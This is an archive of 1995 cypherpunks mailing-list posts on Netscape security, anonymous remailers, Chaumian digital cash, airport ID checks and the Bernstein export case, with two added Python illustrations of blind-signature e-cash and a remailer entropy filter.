"National borders are just speed bumps on the information superhighway."

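Added example, not part of the original thread: a Python model covering both Hal's quoted point (the payer can hand the bank a record of the coins she paid with) and the "immediate clearing" this message prefers, using a toy Chaum-style RSA blind signature. It is not DigiCash's implementation; the key, account names and all class and function names are constructed for the illustration.

```python
import hashlib
import secrets
from math import gcd

# Constructed toy bank key (two Mersenne primes); far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def coin_digest(serial: bytes) -> int:
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    def __init__(self):
        self.withdrawals = []   # (account, blinded value): all the bank sees
        self.spent = set()      # serials already cleared
        self.reported = {}      # serial -> payer who disclosed it

    def sign_blinded(self, account: str, blinded: int) -> int:
        self.withdrawals.append((account, blinded))
        return pow(blinded, D, N)

    def report_coin(self, payer: str, serial: bytes) -> None:
        """The payer gives the bank a record of a coin she paid with."""
        self.reported[serial] = payer

    def deposit(self, account: str, serial: bytes, sig: int):
        """Online clearing: verify, then consult the spent list at once."""
        if pow(sig, E, N) != coin_digest(serial):
            return ("rejected-bad-signature", None)
        if serial in self.spent:
            return ("rejected-double-spend", None)
        self.spent.add(serial)
        # Second field names the payer whose report matches this deposit.
        return ("accepted", self.reported.get(serial))


def withdraw(bank: Bank, account: str):
    """Payer side: blind the coin, have it signed, unblind the result."""
    serial = secrets.token_bytes(16)
    r = 0
    while r < 2 or gcd(r, N) != 1:
        r = secrets.randbelow(N)
    blinded = coin_digest(serial) * pow(r, E, N) % N
    sig = bank.sign_blinded(account, blinded) * pow(r, -1, N) % N
    return serial, sig


def bank_can_link_alone(bank: Bank, serial: bytes) -> bool:
    """Does the deposited coin appear anywhere in the withdrawal log?"""
    return any(b == coin_digest(serial) for _, b in bank.withdrawals)


def explaining_factor(blinded: int, serial: bytes) -> int:
    """Blinding factor under which `blinded` would be a withdrawal of
    `serial`. One exists for every coin, so the log singles none out."""
    return pow(blinded * pow(coin_digest(serial), -1, N) % N, D, N)


if __name__ == "__main__":
    bank = Bank()
    serial, sig = withdraw(bank, "alice")
    print("bank links coin to withdrawal by itself:",
          bank_can_link_alone(bank, serial))
    bank.report_coin("alice", serial)
    print("payee deposit:", bank.deposit("bob", serial, sig))
    print("second deposit:", bank.deposit("carol", serial, sig))
```

Blinding hides the payer from the bank, and the spent list stops a second deposit without any identity embedded in the coin; neither hides the payee from a payer who reports the coin.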





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Wed, 18 Oct 95 18:39:55 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks in Sydney (Australia)
Message-ID: <9510190141.AA13777@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Any interest in a Sydney Australia Cypherpunks
meeting, say in mid-november? I'll be happy to
provide a venue if there is. Replies by email to
me please.

Greg.

- -- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIWsuaRQkCwJ0+ZNAQHJVQQAiyf154u6OKRoEQQj099RGwdcDJBWCKuO
RCVm32OfvDJp00xtfaTfkl6+CTjxk3hu5LO/Q02FhjoCvnm43UPy6KtPuStnnr0h
QvsmcV6OMvuGDxCXIcuGWqBRaz6VPFlnHgWcpYSIpU/7QsIkDdxOblUcvoEJMaDo
Ab4US4qtJmg=
=0BPe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 19 Oct 95 09:57:42 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191458.AA14604@all.net>
Message-ID: <Pine.SUN.3.90.951019115251.17527B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I believe you have been told *SEVERAL* times you *WON'T* get an answer
on this list, and to contact their PR department. Why don't you do us all
a favor. Contact the PR department if this question really burns you so
much. Get an answer. And post it on the list.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 19 Oct 1995, Dr. Frederick B. Cohen wrote:

> The people at Netscape STILL have not told those of us on the list what
> is meant by "security" in their claims.  Does it include integrity?
> Confidentiality?  Availability?  Reduced liability?  Something else?
> I await a responsive answer.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Oct 95 12:10:42 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <199510191905.MAA25411@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Dearest Alice:

A) Please get an alpha account so that I can killfile you.

B) Barring (A), please post an -EXPLOIT-. Back up your words with
working code. Show me how Netscape, properly configured, does what you
describe. Hell, I'll give you a t-shirt for it.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 12:05:03 PDT
To: cypherpunks@toad.com
Subject: Tabling Results for Primes Considered Hard
Message-ID: <acabee0a40021004e13f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:29 PM 10/19/95, Dr. Frederick B. Cohen wrote:

>And how secure is the hash? Is it possible to create values that will
>hash to each prime (or something else that does the job)? Is the hash
>something we can figure a way to precompute using massively parallel
>processing so that we can then provide a set of codes which will produce
>the desired results? (etc.)

There are a lot of primes. Parallel processors will not help much.

(These are deliberately understated points, natch.)

With even such "small" RSA moduli as 200 digits, made up of primes of
roughly 100 digits each, the computed hashes of these numbers would fill
the universe many times over. (There are estimated to be about 10^75
particles of all types in the entire universe, so each particle would be
"responsible" for storing the results (?) for about 10^20 or more primes.)

There may be many more flaws and points of attack in Netscape and SSL, but
precomputing hashes of the primes is not one of them.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Thu, 19 Oct 95 12:40:07 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <199510191930.MAA28188@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: futplex@pseudonym.com (Futplex)
> 
> DCF writes:
> [re: showing picture ID to board commercial flights in the U.S.]
> > I wonder how many have challenged this.  
> 
> During the California-wide Unabomber scare a few months back (before the LAX-
> specific scare), someone on the list said they planned to test it at SJC. I 
> think it was Dana Orfeo. The trip report has never surfaced, though. 
> 
> (Dana ?  Are you there ?)
> 
 
[ Snip ]

I'm here.  And I apologize for failing to write the promised report.
In any case, better late than never...

I flew out of the San Jose "International" Airport (SJC) over the July 4th
weekend to visit a friend of mine.  Many of you may remember this weekend
corresponding with the California-wide Unabomber scare.

I flew on Delta airlines.  My intention was to create as much trouble as
possible with the I.D. bit, though to ultimately capitulate (if necessary)
as I _did_ want to get where I was going.


Private email from Futplex, quoted with permission:

> I suggest acting very innocently at the start, as though you don't suspect
> they might try to card you. Try just having some cash in your wallet --
> put anything that might conceivably identify you in a separate pocket, apart
> from the ticket itself. When they ask you for ID, mildly claim that you
> aren't carrying any. When they insist, show off your anonymous wallet. (You
> might want to claim that a friend dropped you off at the airport, and another
> friend is picking you up at the other end, to explain why you're not carrying
> a driver's license. Maybe you could say you'll be at a convention in a hotel
> for several days, and won't be leaving except walking or by taxi.)  Get them
> to explain very precisely just what gives them the legal authority to
> refuse you entry to the plane. (I'd be interested in hearing the answer
> myself !)  I expect this will work better if they're checking IDs at the
> gates, rather than the general X-ray/security post, so that you're dealing
> with plastic-smiled airline personnel.

I removed all picture identification from my wallet (my CA driver's license)
and packed away my U.S. passport (though I was not leaving the U.S.) deep
inside my luggage (just in case.)

I actually took a Taxi to the airport and was not planning on driving
at any time over the course of my trip.  I could actually truthfully
make these claims, which was useful as I'm not a very good liar.

Unfortunately, I arrived at the airport much later than I had intended.
I checked my bags at curbside, where I was asked for identification.  Not
wanting to miss my flight, I merely looked and acted miffed and dug my
passport out of my baggage.  I then put my passport back into my baggage,
which was then checked.

I hurried to the gate, where I discovered that the flight was delayed by
a good hour.  Damn.  If I had known that, I wouldn't have checked my bags
at the curb.  Oh well.

However, I hadn't been given a boarding pass and still needed to check in
at the gate for that.  Delta wanted I.D. again.  At this point, I was
actually not carrying any picture identification.

The plastic, smiling Delta employee behind the counter at the gate was
not happy, mostly because she looked to be having an otherwise rough day
and obviously didn't want to deal with anything out of the ordinary.

I told her that I had only a U.S. passport, and that it was in my already
checked baggage.  I was hoping the problem would be escalated to management,
where I could start asking about their legal authority for denying me
boarding privileges, but she (probably without authority) essentially said
"to hell with it" and gave me my boarding pass, adding a comment that
the rank-and-file Delta employees thought that the ID requirement was a
bad idea anyway.

There was no verification that I was telling the truth about having checked
my baggage (though I was) so that I could have actually gotten on the plane
without showing my identification.

I've flown twice since then (on SouthWest), without being asked for any
identification.

Dana W. Albrecht
dwa@corsair.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 09:37:30 PDT
To: cypherpunks@toad.com
Subject: Re: SciAm Bye-Byes Privacy
Message-ID: <199510191637.MAA28223@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Scientific American, November, 1995
>
>Rights of Privacy
>
>Technology has its eyes on you
>
>But the search for personalization in a high-tech world
>may create an uncomfortable situation in the global
>village. Villages are safe places but not very private
>ones. Mrs. Grundy, peering from behind her lace curtains,
>did stop housebreakers, but she also tried to halt many
>other things of which she disapproved. There are signs
>that Grundyism is returning to Britain. 

For those who have neglected their education:

1798

Theater --- "Speed the Plough" by English playwright Thomas Morton, 34. "Be
quiet, wull ye [says farmer Ashfield]. Always ding, dinging Dame Grundy into
my ears-What will Mrs. Grundy say? What will Mrs. Grundy think?" 

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Thu, 19 Oct 95 12:54:35 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: responce to graphic encryption replies
Message-ID: <199510191953.MAA29605@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain

find attached the document on PrivaSoft in txt format. Once again if 
you have any comments please call or E-mail me.
Steve Orrin
Mgr. Tech Services

*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************




How Secure Can PrivaSoft Be?

Introduction
PrivaSoft is a communication security product, and the user is entitled to know how secure it is.  This document addresses the question of cryptographic strength of PrivaSoft.

Export license regulations
In some advanced countries, cryptographic products are categorized as "munitions" and their use, sale or exportation is controlled by local licensing regulations.  PrivaSoft has obtained an export license from the governments of Israel and the USA.  Licenses in other countries are obtained in coordination with the local distributors.  The typical policy is to limit the allowable cryptographic strength of commercial products to a level that is strong enough for commercial purposes.  The basic intention of this regulation is to protect the state from abuse of too strong cryptographic products by terrorists and criminals.  Some countries do not practice such law because it is viewed as a denial of freedom of expression.  PrivaSoft willfully complies with these regulations as it is a commercial product, and it is not intended for national security applications with its current key length which is the maximum legally allowable for commercial users.

The cryptographic engine of PrivaSoft
PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number uniformly normalized from the user's secret key.  The engine is proprietary, designed according to the rules of modern cryptology to make the best use of the allowable key length.  Like other dependable cryptographic engines, the structure of the encryption software can be disclosed without compromising the security of the user.  However, the coding and specific parameters of the mechanism are considered a trade secret and will be disclosed for the purpose of cryptoanalytic validation when necessary and under an appropriate non-disclosure non-competition agreement.

The use of default keys
When secret keys or passwords are used by laymen, there is always a conflict between security and convenience:  The user tends to use fixed, easily memorized keys again and again, while the cryptoanalyst only waits for an opportunity to see many messages encrypted by the same key.  PrivaSoft, being a secure commercial product must live in peace with both - allow the user to use a repetitive, default key, and deny the cryptoanalyst the pleasure of having many messages encrypted by one key.  This is done by using the pseudo-random "key extension" feature which is described in the PrivaSoft user's guide.

The information contents a clear message
If a cryptographic product is properly designed, then the almost only way to crack it is to try all possible keys.  If the process is done by a computer, the "cracking" software must be taught to tell the correct key from the wrong keys.  This can only be done if there are some properties of the decrypted message that are known a priori.  With the PrivaSoft analogue graphical encryption, and with the naturally noisy fax images, a significant portion of the page must be reconstructed, and a significant amount of mathematical correlation must be calculated between neighboring areas of the image, before the cracking software can tell whether the candidate key is wrong.  This makes the cracking process much slower than in alphanumeric encryption of the text in a natural language.  The 9 digit key, when applied to analogue, the graphical encryption is equivalent to a much longer key applied to alphanumeric encryption.  The cryptographically oriented user can make it very much harder by some smart pre-processing of the image prior to its encryption.  A simple example:  For a short message, increasing the font size of the text by a factor of 10 will significantly increase the time required for breaking the encryption.

Customized versions of PrivaSoft
PrivaSoft is unique in being a one-stop product that can serve all types of modern correspondence, including E-mail, fax and paper printouts.  Special applications that need and can obtain a license to use non-commercial cryptographic engines can be accommodated by special versions of PrivaSoft.  The cryptographic engine can be customer-furnished and customer integrated, however - since in some areas the integration of this product with certain cryptographic engines may be considered "munitions", each customized version of the product has to be licensed separately in accordance with the laws of the territory where it was created and used.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 19 Oct 95 10:00:06 PDT
To: kelso <kelso@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510182035.NAA28382@netcom22.netcom.com>
Message-ID: <Pine.SUN.3.91.951019125552.25823A-100000@celsius.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, kelso wrote:

> One method to take the heat off of the last remailer
> in a chain would be to call on our friend the "one
> time pad".  A message is split into two equal parts
> that only make sense when the two parts are 'xor'ed
> together. 

Hmmm...this leads to the "unobnoxious anonymous remailer" concept.  I am 
under the impression that most cases of people getting upset about anon 
remailers is when they get threatening email from them.  

One could require that all email going through a remailer must be 
encrypted (perhaps with a universally known key).  That way when Joe 
clueless user gets encrypted mail he doesn't expect, he probably is too 
clueless to go find the key and decrypt it...

This would require the remailer to examine entropy of messages passing 
through.  Anything not random enough gets tossed.

-Thomas
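
[Added example, not part of the original message or of any remailer's code: a sketch of the entropy gate proposed above, run against the XOR split from the quoted text. The names `MIN_LEN`, `THRESHOLD`, `payload_bytes` and `remailer_accepts`, the threshold values and the sample plaintext are assumptions made for illustration.]

```python
import base64
import binascii
import math
import os
from collections import Counter

# Assumed policy values, not taken from the thread.
MIN_LEN = 1024    # shorter bodies give too noisy an estimate; require padding
THRESHOLD = 7.5   # bits per byte; uniform random data approaches 8.0


def shannon_entropy(data):
    """Empirical Shannon entropy of a byte string, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def xor_split(message):
    """Split into a random pad and message XOR pad; either part alone is noise."""
    pad = os.urandom(len(message))
    return pad, bytes(m ^ p for m, p in zip(message, pad))


def xor_join(part_a, part_b):
    """Recombine the two parts produced by xor_split."""
    return bytes(a ^ b for a, b in zip(part_a, part_b))


def payload_bytes(body):
    """Undo base64 armor if the body is armored, else return it unchanged.

    Base64 text cannot exceed about 6 bits per character, so measuring the
    armored form directly would toss every armored ciphertext.
    """
    compact = b"".join(body.split())
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return body


def remailer_accepts(body):
    """Forward only bodies that are long enough and look random enough."""
    payload = payload_bytes(body)
    if len(payload) < MIN_LEN:
        return False
    return shannon_entropy(payload) >= THRESHOLD


# Constructed sample plaintext (not from the thread).
PLAINTEXT = b"Meet me at the usual place on Friday; bring the papers we discussed. " * 40

if __name__ == "__main__":
    part_a, part_b = xor_split(PLAINTEXT)
    armored = base64.encodebytes(part_b)
    for label, body in [("plaintext", PLAINTEXT), ("part A", part_a),
                        ("part B", part_b), ("part B, base64", armored)]:
        print(f"{label:16s} {shannon_entropy(body):5.2f} bits/byte "
              f"accepted={remailer_accepts(body)}")
```

High byte entropy shows only that a body is not readable text; compressed data scores as high as ciphertext, so the gate cannot tell whether anything was actually encrypted.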





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 19 Oct 95 10:02:29 PDT
To: John Gilmore <gnu@toad.com>
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
In-Reply-To: <9510190245.AA20897@toad.com>
Message-ID: <Pine.SUN.3.91.951019130143.25823B-100000@celsius.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, John Gilmore wrote:

> Last reminder!  Come to the Federal Building in SF this Friday at
> 10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
> There for the first skirmish in the trial of crypto export controls.
> 450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.

Q:  Will they allow CU-SeeMe in the courtroom?  (over Metricom radio modem?)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 10:21:18 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <Pine.SUN.3.90.951019115251.17527B-100000@dfw.net>
Message-ID: <9510191718.AA19952@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> I believe you have been told *SEVERAL* times you *WON'T* get an answer
> on this list, and to contact their PR department. Why don't you do us all 
> a favor. Contact the PR department if this question really burns you so 
> much. Get an answer. And post it on the list.

So the PR department defines security at Netscape?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 19 Oct 95 13:20:57 PDT
To: cypherpunks@toad.com (cypherpunks)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <acabe4df3f021004b9f5@[205.199.118.202]>
Message-ID: <9510192017.AA26270@doom>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:

> "Double spending" detection is a REAL MESS. That's my basic conclusion. It
> tends to require schemes for going after double spenders, it tends to make
> identity-revealing attacks possible (such as the attack I alluded to, and
> that Hal more completely describes), and it's INELEGANT.
> 
> "Immediate clearing" is much more elegant, and is, I think, truer to the
> spirit of "anonymous digital cash" than most of these other schemes are.
> (Grep the FAQ for "online" or "online clearing" or "clearing" and you
> should find some stuff. Also, several articles--including one recently by
> me, about a month ago--go into the differences between the types of
> clearing.)

I also suggest taking a look at Stefan Brands' solution, which, while
requiring hardware, has some favorable properties.  Among these are:

   - prior restraint of double spending through hardware-based
   "secret-key certificates"

   - in the case of hardware tampering, double spenders are traceable
   as in Chaum's system; however, the protocol used to achieve this is
   much more efficient than Chaum's "cut-and-choose"

   - no possibility of a subliminal channel between the
   tamper-resistant device and the payee or bank


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Thu, 19 Oct 95 11:18:40 PDT
To: fc@all.net
Subject: [NOISE], period
Message-ID: <9510191730.AA28775@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Wed Oct 18 20:55:59 1995
|   Subject: Re: 50 attacks... [NOISE]
|   X-Mailer: ELM [version 2.4 PL22]
|   Sender: owner-cypherpunks@toad.com
|   X-Status: 
|
|   Dr. Cohen wrote:
|
|   Boy, you people just don't appreciate anything that has a little bit of
|   humor mixed with a little bit of reality. 

It's that 'little bit of reality' that concerns me.

|   2 - I can't believe that you all think that applets (a.k.a.  downloadable
|   programs at the push of a button) will make you safe.  The "we will only
|   run trusted applets and they will all be secure" attitude is 180 degrees
|   off base from my view.

I think it is a misstatement to say that any of us believe that applets
will "make us safe". I believe that applets, combined with the ability to
configure your local browser such that it scans all incoming programs for 
security exceptions, combined with the ability to completely remove those 
classes which allow risky things to occur, combined with the opportunity
to utilize these technologies within trusted channels (i.e., internal nets)
in order to reduce load on our web servers, etc. is an enormous breakthrough.
As such, we are taking our time to review the manner in which the classes
are structured, the VM is structured, and the security mechanisms are enabled.

This appears to be something which you refuse to do.

|   3 - I would have figured at least one of you would have looked up the
|   chosen plaintext attack and told me why Netscape keys can't be gotten
|   at this way.  I think there's an off chance I could win a grand!

Here you reveal more about the poverty of your motives than you could
possibly imagine.

|   4 - If you just keep quiet, I may be able to get $50K out of Netscape
|   for a few minutes of typing.  If they can make a billion on hype, why
|   can't I make $50K?

Because you haven't done your homework.

|   8 - The first 50 flamers responding to this message get a free 1 Gigabyte
|   email message every day for the next week.  Anonymous remailers included.

Oh, I hope I'm still one of the first 50 (I doubt it). I'd love to see the
expression on the face of whoever runs your system. 

"You sent a 1Gb mail message through our mailer?!?"

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Thu, 19 Oct 95 11:43:55 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <9510191339.ZM19844@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


== Dr. Frederick B. Cohen once spoke...
== So the PR department defines security at Netscape?

perhaps not.  however, i would bet that the PR dept. at Netscape could
answer your questions.  have you even *attempted* to contact Netscape
directly?  or are your questions merely rhetorical ramblings?

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 19 Oct 95 06:45:18 PDT
To: John Gilmore <gnu@toad.com>
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
In-Reply-To: <9510190245.AA20897@toad.com>
Message-ID: <Pine.BSD.3.91.951019133453.8166A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


FREE ADVICE WHICH IS WORTH JUST WHAT YOU PAID FOR IT:

    john's comment to "dress like a banker" is VERY APPROPRIATE.  Many
bankers have beards and long hair (as long as they do not interface with
front line customers).  The issue is THE "suit" --and the neatly
combed long beard and preferably ponytailed hair. 
    when I controlled big bucks, I could get through the door of any 
swiss banker in Tshirt and jeans --now I wear my "funeral" suit!
    don't "intimidate" the judge with a crowd of anti-social rowdies 
(yes, us), and show respect for the judge --the demeanor of both the 
protagonists and the "court" influences the judge, and a win at this 
level makes sustaining the judgement through appeals significantly less 
expensive.

On Wed, 18 Oct 1995, John Gilmore wrote:

> Last reminder!  Come to the Federal Building in SF this Friday at
> 10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
> There for the first skirmish in the trial of crypto export controls.
> 450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.
> 
> We've gotten a lot of press interest.  Both the legal-newspapers in
> SF, the Examiner, and many others will be covering it.  Some of them
> breathlessly asked, "Will the cypherpunks hold a demonstration?", but
> what we will demonstrate is how the legal system can turn against the
> bureaucrats and authoritarians who currently hold crypto hostage.
> 
> This will be a low-key meeting, quietly bearing witness, at least
> before we adjourn to a probably rowdy lunch at Max's Opera Cafe at Van
> Ness and Golden Gate Avenues.  If you can't come to the hearing, at
> least come for lunch!
> 
> And don't forget, it's a costume party: Dress like a banker.  Even
> you bitbankers.  Even me.  See you there!
> 
> 	John
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Thu, 19 Oct 95 12:49:07 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <acabe4df3f021004b9f5@[205.199.118.202]>
Message-ID: <199510191948.NAA24841@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Someone claiming to be the nym calling itself tcmay@got.net (Timothy C. 
May) wrote:
>
> As Hal notes, there are a lot of issues and attacks to consider. I'm sorry
> that my brief section on Chaumian digital cash in the Cyphernomicon doesn't
> adequately cover the issues (and as the debates here show, confusion still
> reigns, and no doubt some of my points are misleading, wrong, or
> incomplete).


Boy, if I were you I would want to fix the inadequacy in C'nomicon in
order to protect my positive rep...


> "Double spending" detection is a REAL MESS. That's my basic conclusion. It
> tends to require schemes for going after double spenders,


You mean Real Life(tm) security a.k.a. force, but this isn't 
necessarily so.  We could just as well debit the double-spender's 
rep and lower the limit on how much e-cash he will be issued.


> it tends to make
> identity-revealing attacks possible (such as the attack I alluded to, and
> that Hal more completely describes),


I hesitate to pipe up in such august company, but one of us is
confused.  The attack that we have been discussing is possible because
Chaumian Ecash allows the payer to identify the payee.  This would be
true whether or not there were any protocols related to
double-spending.  (i.e., because the payer knows the actual ID number
of the bill, she can choose to relate it to the bank and then the bank
can identify who turns in that bill.  Has nothing to do with
double-spending.  If the protocol provided for re-blinding before
depositing the bill then this would not be possible, I think, and 
would still have nothing to do with double-spending.)


> and it's INELEGANT.


I personally think it is beautiful, because it allows for off-line
transactions at a cost of a relatively small risk of double-spending.
Perhaps we could modify the protocol and have the best of both worlds?
I think I'll write a separate post on this subject now...


Regards,

Bryce

Announcement: I'm about to fade out from c'punks list for a while, so
be sure and Cc: me if you want me to see your post.

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIarbfWZSllhfG25AQEYzAQAtjBPJ6iZAepKa4sfzFjciX9oPK/orYcl
GT7WpBPJSmPeuBEUdruNDcp3GEuuBit+xOsAqvaORA3epw12BDlzlBN3gU4nq5dL
GmsDR7CKX64Ouz/+qxoMmGPUe/CH6FHg4msIvitE7A6DNltYJMPOfWrVF3lhwcx7
iguZ8TAbtTU=
=fXcK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Thu, 19 Oct 95 13:01:33 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Polymorphic e-cash schemes  was: digital cash and identity disclosure
In-Reply-To: <acabe4df3f021004b9f5@[205.199.118.202]>
Message-ID: <199510192001.OAA25866@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Some cpunks a couple of months ago told us about "agnostic" e-cash
anonymity schemes in which the e-bank accepts both blinded and
un-blinded coin requests, leading to anonymity or non-anonymity at the
choice of the client.  They pointed out how this would be very
easy to implement, based on the current Chaumian system.  I think this
is an excellent idea for social-engineering reasons and I congratulate
them on bringing it up.  (Unfortunately I don't have time right now 
to look up who it is that I am congratulating...)


Perhaps a similar "polymorphism" could be implemented with regard to
on-line/off-line clearing.  When you as a payee receive a Chaumian
Ecash coin, you can choose based on several factors (including
reputation of the payer if he chooses to make his nym known to you,
size of the transaction, time of day, or whatever) to either accept it
immediately and credit the payer with whatever it is you are selling,
or to delay completion of the transaction while you attempt to deposit
the coin with your e-bank.  (If you are wary of "payee-ID proof
stings" like Lucky Green is, then you can go ahead and launder your
coin through an anon account during this interval...)  If your payer
has already spent this coin, then the bank will inform you immediately
and you can cancel the transaction.  (And take whatever other actions
you consider appropriate...)


It seems like such a scheme would include all of the advantages
(off-line clearing) of Chaumian Ecash as well as those
(double-spending prevention) of the on-line clearing systems.  Thus,
TCMay's objections to current Chaumian Ecash would not apply to this
new variation.


I hope that this isn't an old-news yawner to you experts.


Regards,

Bryce

Announcement:  I'm going to be fading off the the c'punks list for a
while, so be sure and Cc: me if you want me to read your post.

signatures follow


            "To strive, to seek, to find and not to yield."   
